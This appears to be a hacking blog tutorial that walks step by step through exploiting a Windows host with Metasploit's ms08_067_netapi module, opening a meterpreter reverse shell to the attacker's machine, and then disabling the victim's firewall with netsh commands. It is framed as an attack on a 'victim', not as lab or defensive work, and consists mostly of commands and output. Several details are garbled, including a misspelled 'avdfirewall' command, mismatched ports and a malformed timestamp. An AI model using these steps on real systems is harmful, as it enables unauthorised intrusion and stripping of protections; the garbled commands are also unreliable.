NetSH

Follow this steps, to disable your victim’s firewall.

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms_08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*

*Now, Set The Local Host – hacker’s local ip address*
msf exploit (ms_08_067_netapi) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*

*Now, Set The Remote Host – target’s local ip address*
msf exploit (ms_08_067_netapi) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now, Set The LPORT & RPORT*
msf exploit (ms_08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit (ms_08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit (ms_08_067_netapi) > show options
*Here we will get the whole details about our exploit process*

Now, let’s make it work. Let’s type:
msf exploit (ms_08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on 192.168.50.15:4444
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:444 -> 192.168.50.7:1045) at 2015-10.11 14:20:19 +0300

meterpreter >

*Type:
meterpreter > shell
*You will get this output*
Process 768 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Mircorost Corp.

C:\WINDOWS\system32>

*Now follow us & type these command 1 by 1*
C:\WINDOWS\system32>netsh firewall showopmode
*you should get this output*
netsh firewall how opmode

Domain profile configuration:
——————————————————————————————–
Operational mode                                            = Enable
Exception mode                                                = Enable

Standard profile configuration (current):
——————————————————————————————–
Operational mode                                            = Enable
Exception mode                                                = Enable

Local Area Connection firewall configuration:
——————————————————————————————–
Operational mode                                            = Enable

 

*Type 1 by 1*
C:\WINDOWS\system32>netsh firewall set opmode mode=DISABLE
C:\WINDOWS\system32>netsh firewall showopmode
*You should get this output*

Domain profile configuration:
——————————————————————————————–
Operational mode                                          = Enable
Exception mode                                              = Enable

Standard profile configuration (current):
——————————————————————————————–
Operational mode                                           = Disable
Exception mode                                               = Enable

Local Area Connection firewall configuration:
——————————————————————————————–

C:\WINDOWS\system32>

*As you can see, the Operation mode is now Disabled, that means = Firewall is OFF*

 

[NOTICE]
*In Windows 7, 8.1 & 10 the output is a bit different, here is an example from Win 8.1*
The command in Win 7, 8.1 & 10 is:
C:\WINDOWS\system32>netsh avdfirewall set allprofile state off

Domain profile configuration:
——————————————————————-
Operational mode                               = Enable
Exception mode                                   = Enable

Standard profile configuration (current):
——————————————————————-
Operational mode                               = Disable
Exception mode                                   = Enable

IMPORTANT: Command executed successfully.
However, “netsh firewall” is deprecated;
use “netsh advfirewall firewall” instead.
For more information on using “netsh advfirewall firewall” commands
instead of “netsh firewall”, see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488

C:\WINDOWS\system32>

 

ENJOY! 🙂

 

Here is an example by Gamer Forever